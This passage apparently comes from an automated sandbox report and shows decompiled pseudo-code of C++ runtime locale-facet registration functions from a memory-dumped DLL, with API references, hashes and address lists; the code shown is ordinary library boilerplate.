				_t305 = __edx;
				_t234 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t330 - 0x14, 0);
				_t315 =  *0x6de96db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6DDB161C(0x6de96d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6DDD66BA(_t330 - 0x14);
					return E6DDF0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6DDE13A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t330 - 0x20);
							E6DDF3D74(_t330 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t307, _t315, 0x14);
							E6DDD6653(_t330 - 0x14, 0);
							_t316 =  *0x6de96ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6DDB161C(0x6de96d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6DDD66BA(_t330 - 0x14);
								return E6DDF0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6DDE1409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t330 - 0x20);
										E6DDF3D74(_t330 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t234, _t308, _t316, 0x14);
										E6DDD6653(_t330 - 0x14, 0);
										_t317 =  *0x6de96de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6DDB161C(0x6de96d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6DDD66BA(_t330 - 0x14);
											return E6DDF0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6DDE1471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t330 - 0x20);
													E6DDF3D74(_t330 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t234, _t309, _t317, 0x14);
													E6DDD6653(_t330 - 0x14, 0);
													_t318 =  *0x6de96dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6DDB161C(0x6de96da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6DDD66BA(_t330 - 0x14);
														return E6DDF0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6DDE14EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t330 - 0x20);
																E6DDF3D74(_t330 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t234, _t310, _t318, 0x14);
																E6DDD6653(_t330 - 0x14, 0);
																_t319 =  *0x6de96dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6DDB161C(0x6de96d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6DDD66BA(_t330 - 0x14);
																	return E6DDF0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6DDE1558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t330 - 0x20);
																			E6DDF3D74(_t330 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t234, _t311, _t319, 0x14);
																			E6DDD6653(_t330 - 0x14, 0);
																			_t320 =  *0x6de96e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6DDB161C(0x6de96dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6DDD66BA(_t330 - 0x14);
																				return E6DDF0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6DDE15C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t330 - 0x20);
																						E6DDF3D74(_t330 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t234, _t312, _t320, 0x14);
																						E6DDD6653(_t330 - 0x14, 0);
																						_t321 =  *0x6de96dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6DDB161C(0x6de96d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6DDD66BA(_t330 - 0x14);
																							return E6DDF0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6DDE162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6DDB1438(_t283);
																									E6DDF3D74(_t330 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de3851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6de3c0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6DDE542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6DDF0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6DDD6FD3(__eflags, _t313);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6de96dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6DDD6FD3(__eflags, _t312);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6de96e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6DDD6FD3(__eflags, _t311);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6de96dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6DDD6FD3(__eflags, _t310);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6de96dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6DDD6FD3(__eflags, _t309);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6de96de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6DDD6FD3(__eflags, _t308);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6de96ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6DDD6FD3(__eflags, _t307);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6de96db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

0x6dddf8a5
0x6dddf8a5
0x6dddf8ac
0x6dddf8b6
0x6dddf8bb
0x6dddf8c6
0x6dddf8ca
0x6dddf8cd
0x6dddf8d2
0x6dddf8d6
0x6dddf8db
0x6dddf8df
0x6dddf924
0x6dddf927
0x6dddf933
0x6dddf8e1
0x6dddf8e3
0x6dddf8e9
0x6dddf8ef
0x6dddf8f7
0x6dddf8fa
0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3

APIs

__EH_prolog3.LIBCMT ref: 6DDDF8AC
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF8B6
int.LIBCPMT ref: 6DDDF8CD

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF907
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF927
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF945

Strings

dmm, xrefs: 6DDDF8C1

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: dmm
API String ID: 651022567-1634957888
Opcode ID: 750d29962bce2d96545cfe75a1c5af22c0e102c2523ce907a12acfcb66a72f8e
Instruction ID: 622732482d85de6770702ea4bad8aeaa75381fd61cdaeee2055d166b622c6fe9
Opcode Fuzzy Hash: 750d29962bce2d96545cfe75a1c5af22c0e102c2523ce907a12acfcb66a72f8e
Instruction Fuzzy Hash: 7111A075D08559DBCF05FBA4C840AFDB7B4AF44318F260009F611AB291DF749A02CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEBBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DDEBBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t66 - 0x14, 0);
				_t63 =  *0x6de96e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6DDB161C(0x6de96e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6DDB171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6DDD66BA(_t66 - 0x14);
					return E6DDF0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6DDEC295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6DDB1438(_t55);
							E6DDF3D74(_t66 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de3851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6de3c414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6DDED028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6DDF0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6DDD6FD3(__eflags, _t61);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6de96e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

0x6ddebbd6
0x6ddebbdd
0x6ddebbe7
0x6ddebbec
0x6ddebbf7
0x6ddebbfb
0x6ddebbfe
0x6ddebc03
0x6ddebc07
0x6ddebc0c
0x6ddebc10
0x6ddebc55
0x6ddebc58
0x6ddebc64
0x6ddebc12
0x6ddebc14
0x6ddebc1a
0x6ddebc20
0x6ddebc28
0x6ddebc2b
0x6ddebc65
0x6ddebc68
0x6ddebc76
0x6ddebc7b
0x6ddebc83
0x6ddebc88
0x6ddebc8a
0x6ddebc90
0x6ddebc93
0x6ddebc9c
0x6ddebc9c
0x6ddebc9c
0x6ddebca0
0x6ddebca6
0x6ddebca9
0x6ddebcb5
0x6ddebc2d
0x6ddebc2d
0x6ddebc30
0x6ddebc34
0x6ddebc38
0x6ddebc45
0x6ddebc4d
0x6ddebc4f
0x00000000
0x6ddebc4f
0x6ddebc16
0x6ddebc16
0x00000000
0x6ddebc16
0x6ddebc14

APIs

__EH_prolog3.LIBCMT ref: 6DDEBBDD
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEBBE7
int.LIBCPMT ref: 6DDEBBFE

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEBC38
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBC58
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBC76

Strings

$nm, xrefs: 6DDEBBF2

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: $nm
API String ID: 651022567-696978172
Opcode ID: 4298f1c62ef1ffdbdf2334b90e4f21af263d7f5ec6f499c1de2c6027746730be
Instruction ID: 4cdc068e590627b12180cbe415b8556feb5e3cbb72a92fb4c0172b24f6db1385
Opcode Fuzzy Hash: 4298f1c62ef1ffdbdf2334b90e4f21af263d7f5ec6f499c1de2c6027746730be
Instruction Fuzzy Hash: 7F11A075909219DBCF01FBA4C840BBDB7B5AF44718F270009F611AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEBB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6DDEBB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t110 - 0x14, 0);
				_t105 =  *0x6de96e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6DDB161C(0x6de96e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6DDB171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6DDD66BA(_t110 - 0x14);
					return E6DDF0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6DDEC229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t110 - 0x20);
							E6DDF3D74(_t110 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t102, _t105, 0x14);
							E6DDD6653(_t110 - 0x14, 0);
							_t106 =  *0x6de96e44; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6DDB161C(0x6de96e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6DDB171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6DDD66BA(_t110 - 0x14);
								return E6DDF0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6DDEC295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6DDB1438(_t93);
										E6DDF3D74(_t110 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de3851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6de3c414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6DDED028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6DDF0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6DDD6FD3(__eflags, _t103);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6de96e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6DDD6FD3(__eflags, _t102);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6de96e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

0x6ddebb30
0x6ddebb37
0x6ddebb41
0x6ddebb46
0x6ddebb51
0x6ddebb55
0x6ddebb58
0x6ddebb5d
0x6ddebb61
0x6ddebb66
0x6ddebb6a
0x6ddebbaf
0x6ddebbb2
0x6ddebbbe
0x6ddebb6c
0x6ddebb6e
0x6ddebb74
0x6ddebb7a
0x6ddebb82
0x6ddebb85
0x6ddebbc2
0x6ddebbd0
0x6ddebbd5
0x6ddebbdd
0x6ddebbe7
0x6ddebbec
0x6ddebbf7
0x6ddebbfb
0x6ddebbfe
0x6ddebc03
0x6ddebc0c
0x6ddebc0e
0x6ddebc10
0x6ddebc55
0x6ddebc58
0x6ddebc64
0x6ddebc12
0x6ddebc12
0x6ddebc14
0x6ddebc1a
0x6ddebc20
0x6ddebc28
0x6ddebc2b
0x6ddebc65
0x6ddebc68
0x6ddebc76
0x6ddebc7b
0x6ddebc83
0x6ddebc88
0x6ddebc8a
0x6ddebc90
0x6ddebc93
0x6ddebc9c
0x6ddebc9c
0x6ddebc9c
0x6ddebca0
0x6ddebca6
0x6ddebca9
0x6ddebcb5
0x6ddebc2d
0x6ddebc2d
0x6ddebc30
0x6ddebc34
0x6ddebc38
0x6ddebc45
0x6ddebc4d
0x6ddebc4f
0x00000000
0x6ddebc4f
0x6ddebc16
0x6ddebc16
0x00000000
0x6ddebc16
0x6ddebc14
0x6ddebb87
0x6ddebb87
0x6ddebb8a
0x6ddebb8e
0x6ddebb92
0x6ddebb9f
0x6ddebba7
0x6ddebba9
0x00000000
0x6ddebba9
0x6ddebb70
0x6ddebb70
0x00000000
0x6ddebb70
0x6ddebb6e

APIs

__EH_prolog3.LIBCMT ref: 6DDEBB37
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEBB41
int.LIBCPMT ref: 6DDEBB58

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEBB92
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBBB2
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBBD0

Strings

nm, xrefs: 6DDEBB4C

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: nm
API String ID: 651022567-2988067050
Opcode ID: 8352e751a791ddb1f79f5c1b3ed9798219c39cb4e0f48fb5b406a4bde38e58f6
Instruction ID: 54befaea2db2728a0bb4802151e3bdb625ca81c9a704962b68d8e6a1e9369386
Opcode Fuzzy Hash: 8352e751a791ddb1f79f5c1b3ed9798219c39cb4e0f48fb5b406a4bde38e58f6
Instruction Fuzzy Hash: F911A075808619DBCF05FBA4C840AFEB775AF44358F270519F511AB290DF74AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
